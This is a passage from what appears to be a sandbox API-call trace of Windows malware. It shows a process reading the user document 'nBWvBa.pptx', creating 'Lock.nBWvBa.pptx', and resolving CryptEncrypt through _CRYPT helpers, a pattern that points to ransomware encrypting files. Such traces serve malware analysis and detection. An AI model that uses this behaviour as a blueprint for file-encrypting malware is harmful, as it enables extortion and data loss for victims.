hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.274] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/nBWvBa.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nbwvba.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.275] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.275] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.275] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.275] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.275] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0266.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.276] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0266.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.nBWvBa.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.nbwvba.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0266.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1250020 [0266.281] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0266.282] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x17c5, lpOverlapped=0x0) returned 1 [0266.283] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0266.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c5) returned 0x2f16018 [0266.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1250020 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c5) returned 0x2f177e8 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c5) returned 0x2f16018 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0266.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0266.288] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c5) returned 0x2f16018 [0266.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c5) returned 0x2f18fb8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0266.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.291] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.291] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.302] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.303] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.303] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.303] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.304] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 